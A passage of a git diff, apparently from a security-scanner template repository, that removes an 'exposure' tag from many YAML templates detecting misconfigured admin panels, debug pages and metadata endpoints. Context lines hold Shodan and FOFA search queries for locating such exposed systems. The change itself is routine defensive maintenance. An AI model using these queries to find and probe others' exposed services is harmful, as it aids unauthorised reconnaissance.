http/misconfiguration/exposed-jquery-file-upload.yaml | 2 +- http/misconfiguration/exposed-kafdrop.yaml | 2 +- http/misconfiguration/front-page-misconfig.yaml | 2 +- http/misconfiguration/gitlab/gitlab-public-repos.yaml | 2 +- http/misconfiguration/gitlab/gitlab-public-snippets.yaml | 2 +- http/misconfiguration/global-traffic-statistics.yaml | 2 +- http/misconfiguration/gocd/gocd-cruise-configuration.yaml | 2 +- http/misconfiguration/gocd/gocd-encryption-key.yaml | 2 +- http/misconfiguration/haproxy-exporter-metrics.yaml | 2 +- http/misconfiguration/healthchecks-ui-exposure.yaml | 2 +- http/misconfiguration/hfs-exposure.yaml | 2 +- http/misconfiguration/ibm-friendly-path-exposure.yaml | 2 +- http/misconfiguration/ibm-websphere-xml.yaml | 2 +- http/misconfiguration/installer/acunetix-360-installer.yaml | 2 +- http/misconfiguration/installer/ampache-music-installer.yaml | 2 +- http/misconfiguration/installer/bagisto-installer.yaml | 2 +- http/misconfiguration/installer/binom-installer.yaml | 2 +- http/misconfiguration/installer/blesta-installer.yaml | 2 +- http/misconfiguration/installer/circarlife-setup.yaml | 2 +- http/misconfiguration/installer/cloudcenter-Installer.yaml | 2 +- http/misconfiguration/installer/codeigniter-installer.yaml | 2 +- http/misconfiguration/installer/concrete-installer.yaml | 2 +- http/misconfiguration/installer/contentify-installer.yaml | 2 +- http/misconfiguration/installer/dokuwiki-installer.yaml | 2 +- http/misconfiguration/installer/dolibarr-installer.yaml | 2 +- http/misconfiguration/installer/eshop-installer.yaml | 2 +- http/misconfiguration/installer/espeasy-installer.yaml | 2 +- http/misconfiguration/installer/facturascripts-installer.yaml | 2 +- http/misconfiguration/installer/geniusocean-installer.yaml | 2 +- http/misconfiguration/installer/getsimple-installation.yaml | 2 +- http/misconfiguration/installer/gogs-installer.yaml | 2 +- http/misconfiguration/installer/impresspages-installer.yaml | 2 +- http/misconfiguration/installer/lmszai-installer.yaml | 2 +- http/misconfiguration/installer/lychee-installer.yaml | 2 +- http/misconfiguration/installer/magento-installer.yaml | 2 +- http/misconfiguration/installer/magnolia-installer.yaml | 2 +- http/misconfiguration/installer/mcloud-installer.yaml | 2 +- http/misconfiguration/installer/moodle-installer.yaml | 2 +- http/misconfiguration/installer/nagiosxi-installer.yaml | 2 +- .../installer/netsparker-enterprise-installer.yaml | 2 +- http/misconfiguration/installer/nginx-auto-installer.yaml | 2 +- http/misconfiguration/installer/nodebb-installer.yaml | 2 +- http/misconfiguration/installer/openmage-install.yaml | 2 +- http/misconfiguration/installer/opensis-installer.yaml | 2 +- http/misconfiguration/installer/orangehrm-installer.yaml | 2 +- .../installer/owncloud-installer-exposure.yaml | 2 +- http/misconfiguration/installer/oxid-eshop-installer.yaml | 2 +- http/misconfiguration/installer/pagekit-installer.yaml | 2 +- http/misconfiguration/installer/permissions-installer.yaml | 2 +- http/misconfiguration/installer/phpbb-installer.yaml | 2 +- http/misconfiguration/installer/phpwind-installer.yaml | 2 +- http/misconfiguration/installer/pmm-installer.yaml | 2 +- http/misconfiguration/installer/prestashop-installer.yaml | 2 +- http/misconfiguration/installer/processwire-installer.yaml | 2 +- http/misconfiguration/installer/server-monitor-installer.yaml | 2 +- http/misconfiguration/installer/smf-installer.yaml | 2 +- http/misconfiguration/installer/sumowebtools-installer.yaml | 2 +- http/misconfiguration/installer/tasmota-install.yaml | 2 +- http/misconfiguration/installer/testrail-install.yaml | 2 +- http/misconfiguration/installer/turbo-website-installer.yaml | 2 +- http/misconfiguration/installer/unifi-wizard-install.yaml | 2 +- http/misconfiguration/installer/uvdesk-install.yaml | 2 +- http/misconfiguration/installer/vtiger-installer.yaml | 2 +- http/misconfiguration/installer/webasyst-installer.yaml | 2 +- http/misconfiguration/installer/webuzo-installer.yaml | 2 +- http/misconfiguration/iot-vdme-simulator.yaml | 2 +- http/misconfiguration/kubernetes/kube-state-metrics.yaml | 2 +- http/misconfiguration/kubernetes/kubernetes-metrics.yaml | 2 +- .../kubernetes/kubernetes-resource-report.yaml | 2 +- http/misconfiguration/libvirt-exporter-metrics.yaml | 2 +- http/misconfiguration/liferay/liferay-api.yaml | 2 +- http/misconfiguration/liferay/liferay-axis.yaml | 2 +- http/misconfiguration/liferay/liferay-jsonws.yaml | 2 +- http/misconfiguration/linktap-gateway-exposure.yaml | 2 +- http/misconfiguration/locust-exposure.yaml | 2 +- http/misconfiguration/lvm-exporter-metrics.yaml | 2 +- http/misconfiguration/mobiproxy-dashboard.yaml | 2 +- http/misconfiguration/moleculer-microservices.yaml | 2 +- http/misconfiguration/mongodb-exporter-metrics.yaml | 2 +- http/misconfiguration/mysqld-exporter-metrics.yaml | 2 +- http/misconfiguration/namedprocess-exporter-metrics.yaml | 2 +- http/misconfiguration/node-exporter-metrics.yaml | 2 +- http/misconfiguration/ntop-panel-exposed.yaml | 2 +- http/misconfiguration/oneinstack-control-center.yaml | 2 +- http/misconfiguration/pa11y-dashboard.yaml | 2 +- http/misconfiguration/pghero-dashboard-exposure.yaml | 2 +- http/misconfiguration/phpmemcached-admin-panel.yaml | 2 +- http/misconfiguration/postgres-exporter-metrics.yaml | 2 +- http/misconfiguration/private-key-exposure.yaml | 2 +- http/misconfiguration/proxy/metadata-alibaba.yaml | 2 +- http/misconfiguration/proxy/metadata-aws.yaml | 2 +- http/misconfiguration/proxy/metadata-azure.yaml | 2 +- http/misconfiguration/proxy/metadata-digitalocean.yaml | 2 +- http/misconfiguration/proxy/metadata-google.yaml | 2 +- http/misconfiguration/proxy/metadata-hetzner.yaml | 2 +- http/misconfiguration/proxy/metadata-openstack.yaml | 2 +- http/misconfiguration/proxy/metadata-oracle.yaml | 2 +- http/misconfiguration/proxy/open-proxy-internal.yaml | 2 +- http/misconfiguration/proxy/open-proxy-localhost.yaml | 2 +- http/misconfiguration/proxy/open-proxy-portscan.yaml | 2 +- http/misconfiguration/puppetdb-dashboard.yaml | 2 +- http/misconfiguration/python-metrics.yaml | 2 +- http/misconfiguration/questdb-console.yaml | 2 +- http/misconfiguration/rabbitmq-exporter-metrics.yaml | 2 +- http/misconfiguration/ray-dashboard.yaml | 2 +- http/misconfiguration/rekognition-image-validation.yaml | 2 +- http/misconfiguration/salesforce-aura.yaml | 2 +- http/misconfiguration/service-pwd.yaml | 2 +- http/misconfiguration/setup-github-enterprise.yaml | 2 +- http/misconfiguration/skycaiji-install.yaml | 2 +- http/misconfiguration/smarterstats-setup.yaml | 2 +- http/misconfiguration/sony-bravia-disclosure.yaml | 2 +- http/misconfiguration/spidercontrol-scada-server-info.yaml | 2 +- http/misconfiguration/springboot/spring-eureka.yaml | 2 +- http/misconfiguration/springboot/springboot-auditevents.yaml | 2 +- http/misconfiguration/springboot/springboot-autoconfig.yaml | 2 +- http/misconfiguration/springboot/springboot-beans.yaml | 2 +- http/misconfiguration/springboot/springboot-caches.yaml | 2 +- http/misconfiguration/springboot/springboot-conditions.yaml | 2 +- http/misconfiguration/springboot/springboot-configprops.yaml | 2 +- http/misconfiguration/springboot/springboot-dump.yaml | 2 +- http/misconfiguration/springboot/springboot-env.yaml | 2 +- http/misconfiguration/springboot/springboot-features.yaml | 2 +- http/misconfiguration/springboot/springboot-flyway.yaml | 2 +- http/misconfiguration/springboot/springboot-gateway.yaml | 2 +- http/misconfiguration/springboot/springboot-health.yaml | 2 +- http/misconfiguration/springboot/springboot-heapdump.yaml | 2 +- http/misconfiguration/springboot/springboot-httptrace.yaml | 2 +- http/misconfiguration/springboot/springboot-jolokia.yaml | 2 +- http/misconfiguration/springboot/springboot-liquidbase.yaml | 2 +- http/misconfiguration/springboot/springboot-logfile.yaml | 2 +- http/misconfiguration/springboot/springboot-loggerconfig.yaml | 2 +- http/misconfiguration/springboot/springboot-loggers.yaml | 2 +- http/misconfiguration/springboot/springboot-mappings.yaml | 2 +- http/misconfiguration/springboot/springboot-metrics.yaml | 2 +- .../misconfiguration/springboot/springboot-scheduledtasks.yaml | 2 +- http/misconfiguration/springboot/springboot-status.yaml | 2 +- http/misconfiguration/springboot/springboot-trace.yaml | 2 +- http/misconfiguration/sql-server-report-viewer.yaml | 2 +- http/misconfiguration/syncthing-dashboard.yaml | 2 +- http/misconfiguration/system-properties-exposure.yaml | 2 +- http/misconfiguration/tasmota-config-webui.yaml | 2 +- http/misconfiguration/thinkphp-errors.yaml | 2 +- http/misconfiguration/tomcat-cookie-exposed.yaml | 2 +- http/misconfiguration/transmission-dashboard.yaml | 2 +- http/misconfiguration/typo3-composer.yaml | 2 +- http/misconfiguration/unauth-apache-kafka-ui.yaml | 2 +- http/misconfiguration/unauth-axyom-network-manager.yaml | 2 +- http/misconfiguration/unauth-kubecost.yaml | 2 +- http/misconfiguration/unauth-wavink-panel.yaml | 2 +- http/misconfiguration/unauthenticated-glances.yaml | 2 +- http/misconfiguration/viewpoint-system-status.yaml | 2 +- http/misconfiguration/wamp-server-configuration.yaml | 2 +- http/misconfiguration/webdav-enabled.yaml | 2 +- 191 files changed, 192 insertions(+), 191 deletions(-) diff --git a/http/misconfiguration/ace-admin-dashboard.yaml b/http/misconfiguration/ace-admin-dashboard.yaml index bf496b44b7..798d0fde2f 100644 --- a/http/misconfiguration/ace-admin-dashboard.yaml +++ b/http/misconfiguration/ace-admin-dashboard.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: title:"Dashboard - Ace Admin" - tags: misconfig,exposure,aceadmin + tags: misconfig,aceadmin http: - method: GET diff --git a/http/misconfiguration/aem/aem-crx-browser.yaml b/http/misconfiguration/aem/aem-crx-browser.yaml index 2c13bb3ea9..14962133f7 100644 --- a/http/misconfiguration/aem/aem-crx-browser.yaml +++ b/http/misconfiguration/aem/aem-crx-browser.yaml @@ -11,7 +11,7 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - tags: misconfig,aem,adobe,exposure + tags: misconfig,aem,adobe http: - method: GET diff --git a/http/misconfiguration/aem/aem-crx-namespace.yaml b/http/misconfiguration/aem/aem-crx-namespace.yaml index c7b3fc1457..55912c04af 100644 --- a/http/misconfiguration/aem/aem-crx-namespace.yaml +++ b/http/misconfiguration/aem/aem-crx-namespace.yaml @@ -11,7 +11,7 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - tags: exposure,aem,adobe,misconfig + tags: aem,adobe,misconfig http: - method: GET diff --git a/http/misconfiguration/aem/aem-crx-search.yaml b/http/misconfiguration/aem/aem-crx-search.yaml index 72c2066ee0..e8a805a256 100644 --- a/http/misconfiguration/aem/aem-crx-search.yaml +++ b/http/misconfiguration/aem/aem-crx-search.yaml @@ -11,7 +11,7 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - tags: misconfig,aem,adobe,exposure + tags: misconfig,aem,adobe http: - method: GET diff --git a/http/misconfiguration/aem/aem-disk-usage.yaml b/http/misconfiguration/aem/aem-disk-usage.yaml index 628a753941..f11174a124 100644 --- a/http/misconfiguration/aem/aem-disk-usage.yaml +++ b/http/misconfiguration/aem/aem-disk-usage.yaml @@ -11,7 +11,7 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - tags: misconfig,aem,adobe,exposure + tags: misconfig,aem,adobe http: - method: GET diff --git a/http/misconfiguration/aem/aem-explorer-nodetypes.yaml b/http/misconfiguration/aem/aem-explorer-nodetypes.yaml index da3d82c298..9940c91147 100644 --- a/http/misconfiguration/aem/aem-explorer-nodetypes.yaml +++ b/http/misconfiguration/aem/aem-explorer-nodetypes.yaml @@ -11,7 +11,7 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - tags: misconfig,aem,adobe,exposure + tags: misconfig,aem,adobe http: - method: GET diff --git a/http/misconfiguration/aem/aem-external-link-checker.yaml b/http/misconfiguration/aem/aem-external-link-checker.yaml index 316cb3e06b..2dbfab58b5 100644 --- a/http/misconfiguration/aem/aem-external-link-checker.yaml +++ b/http/misconfiguration/aem/aem-external-link-checker.yaml @@ -11,7 +11,7 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - tags: misconfig,aem,adobe,exposure + tags: misconfig,aem,adobe http: - method: GET diff --git a/http/misconfiguration/aem/aem-misc-admin.yaml b/http/misconfiguration/aem/aem-misc-admin.yaml index 5078301e8a..2d6b3f46e8 100644 --- a/http/misconfiguration/aem/aem-misc-admin.yaml +++ b/http/misconfiguration/aem/aem-misc-admin.yaml @@ -12,7 +12,7 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - tags: misconfig,aem,adobe,exposure + tags: misconfig,aem,adobe http: - method: GET diff --git a/http/misconfiguration/aem/aem-secrets.yaml b/http/misconfiguration/aem/aem-secrets.yaml index 0eab636ffc..e949d24cca 100644 --- a/http/misconfiguration/aem/aem-secrets.yaml +++ b/http/misconfiguration/aem/aem-secrets.yaml @@ -11,7 +11,8 @@ info: metadata: max-request: 2 verified: true - tags: aem,adobe,misconfig,exposure + tags: aem,adobe,misconfig + verified: "true" http: - method: GET diff --git a/http/misconfiguration/aem/aem-security-users.yaml b/http/misconfiguration/aem/aem-security-users.yaml index 598dd877a0..b071d7d310 100644 --- a/http/misconfiguration/aem/aem-security-users.yaml +++ b/http/misconfiguration/aem/aem-security-users.yaml @@ -11,7 +11,7 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - tags: misconfig,aem,adobe,exposure + tags: misconfig,aem,adobe http: - method: GET diff --git a/http/misconfiguration/aem/aem-sling-userinfo.yaml b/http/misconfiguration/aem/aem-sling-userinfo.yaml index 5b804c10fc..da282ebf18 100644 --- a/http/misconfiguration/aem/aem-sling-userinfo.yaml +++ b/http/misconfiguration/aem/aem-sling-userinfo.yaml @@ -11,7 +11,7 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - tags: misconfig,aem,adobe,exposure + tags: misconfig,aem,adobe http: - method: GET diff --git a/http/misconfiguration/ampache-update-exposure.yaml b/http/misconfiguration/ampache-update-exposure.yaml index d5c8068cee..1140c34725 100644 --- a/http/misconfiguration/ampache-update-exposure.yaml +++ b/http/misconfiguration/ampache-update-exposure.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: http.html:"Ampache Update" - tags: misconfig,ampache,exposure + tags: misconfig,ampache http: - method: GET diff --git a/http/misconfiguration/apache-drill-exposure.yaml b/http/misconfiguration/apache-drill-exposure.yaml index 69c86b5874..c2d50e6d6e 100644 --- a/http/misconfiguration/apache-drill-exposure.yaml +++ b/http/misconfiguration/apache-drill-exposure.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Apache Drill" - tags: misconfig,exposure,apache,drill + tags: misconfig,apache,drill http: - method: GET diff --git a/http/misconfiguration/apache-struts-showcase.yaml b/http/misconfiguration/apache-struts-showcase.yaml index db630a9676..e397c7642e 100644 --- a/http/misconfiguration/apache-struts-showcase.yaml +++ b/http/misconfiguration/apache-struts-showcase.yaml @@ -10,7 +10,7 @@ info: max-request: 2 verified: true shodan-query: title:"Struts2 Showcase" - tags: apache,struts,showcase,misconfig,exposure + tags: apache,struts,showcase,misconfig http: - method: GET diff --git a/http/misconfiguration/apache/kafka-manager-unauth.yaml b/http/misconfiguration/apache/kafka-manager-unauth.yaml index 4d9bccddd7..bb37222e5d 100644 --- a/http/misconfiguration/apache/kafka-manager-unauth.yaml +++ b/http/misconfiguration/apache/kafka-manager-unauth.yaml @@ -10,7 +10,7 @@ info: metadata: max-request: 1 fofa-query: app="Kafka-Manager" - tags: misconfig,apache,kafka,unauth,exposure + tags: misconfig,apache,kafka,unauth http: - method: GET diff --git a/http/misconfiguration/awstats-listing.yaml b/http/misconfiguration/awstats-listing.yaml index 74572a1f9f..d6d2520b5a 100644 --- a/http/misconfiguration/awstats-listing.yaml +++ b/http/misconfiguration/awstats-listing.yaml @@ -5,7 +5,7 @@ info: author: tess severity: low description: Searches for exposed awstats Internal Information. - tags: misconfig,aws,exposure,amazon,awstats,oss + tags: misconfig,aws,amazon,awstats,oss metadata: max-request: 1 diff --git a/http/misconfiguration/blackbox-exporter-metrics.yaml b/http/misconfiguration/blackbox-exporter-metrics.yaml index ebeb32639e..b849b61ca4 100644 --- a/http/misconfiguration/blackbox-exporter-metrics.yaml +++ b/http/misconfiguration/blackbox-exporter-metrics.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Blackbox Exporter" - tags: blackbox,exposure,debug,misconfig + tags: blackbox,debug,misconfig http: - method: GET diff --git a/http/misconfiguration/bootstrap-admin-panel-template.yaml b/http/misconfiguration/bootstrap-admin-panel-template.yaml index 78053feb45..b4b3125351 100644 --- a/http/misconfiguration/bootstrap-admin-panel-template.yaml +++ b/http/misconfiguration/bootstrap-admin-panel-template.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: title:"Dashboard - Bootstrap Admin Template" - tags: bootstrap,panel,misconfig,exposure + tags: bootstrap,panel,misconfig http: - method: GET diff --git a/http/misconfiguration/cadvisor-exposure.yaml b/http/misconfiguration/cadvisor-exposure.yaml index bdb9b22b8e..10ce627942 100644 --- a/http/misconfiguration/cadvisor-exposure.yaml +++ b/http/misconfiguration/cadvisor-exposure.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: title:"cAdvisor" - tags: exposure,misconfig,dashboard + tags: misconfig,dashboard http: - method: GET diff --git a/http/misconfiguration/clockwork-dashboard-exposure.yaml b/http/misconfiguration/clockwork-dashboard-exposure.yaml index e920d4ecb8..e870322540 100644 --- a/http/misconfiguration/clockwork-dashboard-exposure.yaml +++ b/http/misconfiguration/clockwork-dashboard-exposure.yaml @@ -6,7 +6,7 @@ info: severity: high reference: - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/clockwork-dashboard-exposure.json - tags: exposure,unauth,misconfig + tags: unauth,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/cloud-metadata.yaml b/http/misconfiguration/cloud-metadata.yaml index d2a91758ad..207e4685a0 100644 --- a/http/misconfiguration/cloud-metadata.yaml +++ b/http/misconfiguration/cloud-metadata.yaml @@ -9,7 +9,7 @@ info: max-request: 1 verified: true shodan-query: html:"instance_metadata" - tags: misconfig,exposure,devops,cloud,aws,gcp + tags: misconfig,devops,cloud,aws,gcp http: - method: GET diff --git a/http/misconfiguration/cobbler-exposed-directory.yaml b/http/misconfiguration/cobbler-exposed-directory.yaml index be81a8e068..5ad934649e 100644 --- a/http/misconfiguration/cobbler-exposed-directory.yaml +++ b/http/misconfiguration/cobbler-exposed-directory.yaml @@ -5,7 +5,7 @@ info: author: c-sh0 severity: medium description: Searches for exposed Cobbler Directories - tags: cobbler,exposure,misconfig + tags: cobbler,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/codemeter-webadmin.yaml b/http/misconfiguration/codemeter-webadmin.yaml index 47e6c8e0bf..72195d6e29 100644 --- a/http/misconfiguration/codemeter-webadmin.yaml +++ b/http/misconfiguration/codemeter-webadmin.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: html:"CodeMeter" - tags: misconfig,exposure,codemeter + tags: misconfig,codemeter http: - method: GET diff --git a/http/misconfiguration/codis-dashboard.yaml b/http/misconfiguration/codis-dashboard.yaml index 71fc8839c5..62c1f9aff2 100644 --- a/http/misconfiguration/codis-dashboard.yaml +++ b/http/misconfiguration/codis-dashboard.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Codis • Dashboard" - tags: misconfig,exposure,codis + tags: misconfig,codis http: - method: GET diff --git a/http/misconfiguration/collectd-exporter-metrics.yaml b/http/misconfiguration/collectd-exporter-metrics.yaml index 499911533b..66c8381eec 100644 --- a/http/misconfiguration/collectd-exporter-metrics.yaml +++ b/http/misconfiguration/collectd-exporter-metrics.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Collectd Exporter" - tags: collectd,exposure,debug,misconfig + tags: collectd,debug,misconfig http: - method: GET diff --git a/http/misconfiguration/confluence-dashboard.yaml b/http/misconfiguration/confluence-dashboard.yaml index 36de53666b..bc080433c3 100644 --- a/http/misconfiguration/confluence-dashboard.yaml +++ b/http/misconfiguration/confluence-dashboard.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Dashboard - Confluence" - tags: misconfig,exposure,confluence,atlassian + tags: misconfig,confluence,atlassian http: - method: GET diff --git a/http/misconfiguration/corebos-htaccess.yaml b/http/misconfiguration/corebos-htaccess.yaml index 8ead5802d0..fff4d89992 100644 --- a/http/misconfiguration/corebos-htaccess.yaml +++ b/http/misconfiguration/corebos-htaccess.yaml @@ -12,7 +12,7 @@ info: max-request: 1 verified: true shodan-query: http.html:"corebos" - tags: exposure,corebos,huntr,misconfig + tags: corebos,huntr,misconfig http: - method: GET diff --git a/http/misconfiguration/debug/bottle-debug.yaml b/http/misconfiguration/debug/bottle-debug.yaml index 9395cd343d..d5ebbaee40 100644 --- a/http/misconfiguration/debug/bottle-debug.yaml +++ b/http/misconfiguration/debug/bottle-debug.yaml @@ -10,7 +10,7 @@ info: max-request: 1 verified: true shodan-query: html:"Sorry, the requested URL" - tags: bottle,exposure,debug,misconfig + tags: bottle,debug,misconfig http: - method: GET diff --git a/http/misconfiguration/debug/flask-werkzeug-debug.yaml b/http/misconfiguration/debug/flask-werkzeug-debug.yaml index 2c939b53ab..bc67b231a2 100644 --- a/http/misconfiguration/debug/flask-werkzeug-debug.yaml +++ b/http/misconfiguration/debug/flask-werkzeug-debug.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: html:"Werkzeug powered traceback interpreter" - tags: werkzeug,exposure,debug,misconfig + tags: werkzeug,debug,misconfig http: - method: GET diff --git a/http/misconfiguration/dgraph-dashboard-exposure.yaml b/http/misconfiguration/dgraph-dashboard-exposure.yaml index cef5ec1226..2cd78dde03 100644 --- a/http/misconfiguration/dgraph-dashboard-exposure.yaml +++ b/http/misconfiguration/dgraph-dashboard-exposure.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Dgraph Ratel Dashboard" - tags: exposure,unauth,panel,misconfig + tags: unauth,panel,misconfig http: - method: GET diff --git a/http/misconfiguration/docmosis-tornado-server.yaml b/http/misconfiguration/docmosis-tornado-server.yaml index 2020932772..0e276861c5 100644 --- a/http/misconfiguration/docmosis-tornado-server.yaml +++ b/http/misconfiguration/docmosis-tornado-server.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Docmosis Tornado" - tags: misconfig,tornado,exposure + tags: misconfig,tornado http: - method: GET diff --git a/http/misconfiguration/elastic-hd-dashboard.yaml b/http/misconfiguration/elastic-hd-dashboard.yaml index 6217bff003..4fad731a2b 100644 --- a/http/misconfiguration/elastic-hd-dashboard.yaml +++ b/http/misconfiguration/elastic-hd-dashboard.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Elastic HD Dashboard" - tags: misconfig,exposure,elastic + tags: misconfig,elastic http: - method: GET diff --git a/http/misconfiguration/encompass-cm1-homepage.yaml b/http/misconfiguration/encompass-cm1-homepage.yaml index 2f8cefda00..bbd33edb58 100644 --- a/http/misconfiguration/encompass-cm1-homepage.yaml +++ b/http/misconfiguration/encompass-cm1-homepage.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: title:"Encompass CM1 Home Page" - tags: misconfig,encompass,exposure + tags: misconfig,encompass http: - method: GET diff --git a/http/misconfiguration/envoy-admin-exposure.yaml b/http/misconfiguration/envoy-admin-exposure.yaml index a700cb51aa..9b98d8f07a 100644 --- a/http/misconfiguration/envoy-admin-exposure.yaml +++ b/http/misconfiguration/envoy-admin-exposure.yaml @@ -10,7 +10,7 @@ info: max-request: 1 verified: true shodan-query: title:"Envoy Admin" - tags: misconfig,envoy,exposure + tags: misconfig,envoy http: - method: GET diff --git a/http/misconfiguration/espeasy-mega-exposure.yaml b/http/misconfiguration/espeasy-mega-exposure.yaml index d3b519eb46..9e34f90548 100644 --- a/http/misconfiguration/espeasy-mega-exposure.yaml +++ b/http/misconfiguration/espeasy-mega-exposure.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: http.html:"ESP Easy Mega" - tags: misconfig,espeasy,exposure + tags: misconfig,espeasy http: - method: GET diff --git a/http/misconfiguration/esphome-dashboard.yaml b/http/misconfiguration/esphome-dashboard.yaml index 1459230a30..5ee7d62cb5 100644 --- a/http/misconfiguration/esphome-dashboard.yaml +++ b/http/misconfiguration/esphome-dashboard.yaml @@ -10,7 +10,7 @@ info: max-request: 1 verified: true shodan-query: title:"Dashboard - ESPHome" - tags: misconfig,esphome,exposure,iot + tags: misconfig,esphome,iot http: - method: GET diff --git a/http/misconfiguration/everything-listing.yaml b/http/misconfiguration/everything-listing.yaml index a2850b27d0..71d47d833b 100644 --- a/http/misconfiguration/everything-listing.yaml +++ b/http/misconfiguration/everything-listing.yaml @@ -12,7 +12,7 @@ info: max-request: 1 verified: 'true' shodan-query: http.favicon.hash:-977323269 - tags: exposure,everything,listing,voidtools,misconfig + tags: everything,listing,voidtools,misconfig http: - method: GET diff --git a/http/misconfiguration/exposed-jquery-file-upload.yaml b/http/misconfiguration/exposed-jquery-file-upload.yaml index 01fb075db6..d15ffa7434 100644 --- a/http/misconfiguration/exposed-jquery-file-upload.yaml +++ b/http/misconfiguration/exposed-jquery-file-upload.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cwe-id: CWE-434 - tags: exposure,jquery,edb,misconfig + tags: jquery,edb,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/exposed-kafdrop.yaml b/http/misconfiguration/exposed-kafdrop.yaml index a7fbef20bd..0e2a3324fe 100644 --- a/http/misconfiguration/exposed-kafdrop.yaml +++ b/http/misconfiguration/exposed-kafdrop.yaml @@ -4,7 +4,7 @@ info: name: Publicly exposed Kafdrop Interface author: dhiyaneshDk severity: low - tags: exposure,misconfig,kafdrop + tags: misconfig,kafdrop metadata: max-request: 1 diff --git a/http/misconfiguration/front-page-misconfig.yaml b/http/misconfiguration/front-page-misconfig.yaml index c009369d17..ad5a7528a5 100644 --- a/http/misconfiguration/front-page-misconfig.yaml +++ b/http/misconfiguration/front-page-misconfig.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://docs.microsoft.com/en-us/archive/blogs/fabdulwahab/security-protecting-sharepoint-server-applications - tags: misconfig,exposure,frontpage + tags: misconfig,frontpage metadata: max-request: 2 diff --git a/http/misconfiguration/gitlab/gitlab-public-repos.yaml b/http/misconfiguration/gitlab/gitlab-public-repos.yaml index f3c7441c13..3b0432bdfe 100644 --- a/http/misconfiguration/gitlab/gitlab-public-repos.yaml +++ b/http/misconfiguration/gitlab/gitlab-public-repos.yaml @@ -10,7 +10,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"GitLab" - tags: gitlab,exposure,misconfig + tags: gitlab,misconfig http: - method: GET diff --git a/http/misconfiguration/gitlab/gitlab-public-snippets.yaml b/http/misconfiguration/gitlab/gitlab-public-snippets.yaml index 257786749b..842873238e 100644 --- a/http/misconfiguration/gitlab/gitlab-public-snippets.yaml +++ b/http/misconfiguration/gitlab/gitlab-public-snippets.yaml @@ -10,7 +10,7 @@ info: metadata: max-request: 2 shodan-query: http.title:"GitLab" - tags: gitlab,exposure,misconfig + tags: gitlab,misconfig http: - method: GET diff --git a/http/misconfiguration/global-traffic-statistics.yaml b/http/misconfiguration/global-traffic-statistics.yaml index ccbe034b19..3a3bf0adcb 100644 --- a/http/misconfiguration/global-traffic-statistics.yaml +++ b/http/misconfiguration/global-traffic-statistics.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Global Traffic Statistics" - tags: misconfig,global,exposure + tags: misconfig,global http: - method: GET diff --git a/http/misconfiguration/gocd/gocd-cruise-configuration.yaml b/http/misconfiguration/gocd/gocd-cruise-configuration.yaml index 1a54539c2b..9705b7f26a 100644 --- a/http/misconfiguration/gocd/gocd-cruise-configuration.yaml +++ b/http/misconfiguration/gocd/gocd-cruise-configuration.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version" - tags: go,gocd,config,exposure,misconfig + tags: go,gocd,config,misconfig http: - method: GET diff --git a/http/misconfiguration/gocd/gocd-encryption-key.yaml b/http/misconfiguration/gocd/gocd-encryption-key.yaml index a57722007f..ffc1503779 100644 --- a/http/misconfiguration/gocd/gocd-encryption-key.yaml +++ b/http/misconfiguration/gocd/gocd-encryption-key.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version" - tags: go,gocd,exposure,misconfig + tags: go,gocd,misconfig http: - method: GET diff --git a/http/misconfiguration/haproxy-exporter-metrics.yaml b/http/misconfiguration/haproxy-exporter-metrics.yaml index 9e34eccc31..b949ba9180 100644 --- a/http/misconfiguration/haproxy-exporter-metrics.yaml +++ b/http/misconfiguration/haproxy-exporter-metrics.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"haproxy exporter" - tags: haproxy,exposure,debug,misconfig + tags: haproxy,debug,misconfig http: - method: GET diff --git a/http/misconfiguration/healthchecks-ui-exposure.yaml b/http/misconfiguration/healthchecks-ui-exposure.yaml index e5c1b2546c..a8367fc095 100644 --- a/http/misconfiguration/healthchecks-ui-exposure.yaml +++ b/http/misconfiguration/healthchecks-ui-exposure.yaml @@ -8,7 +8,7 @@ info: max-request: 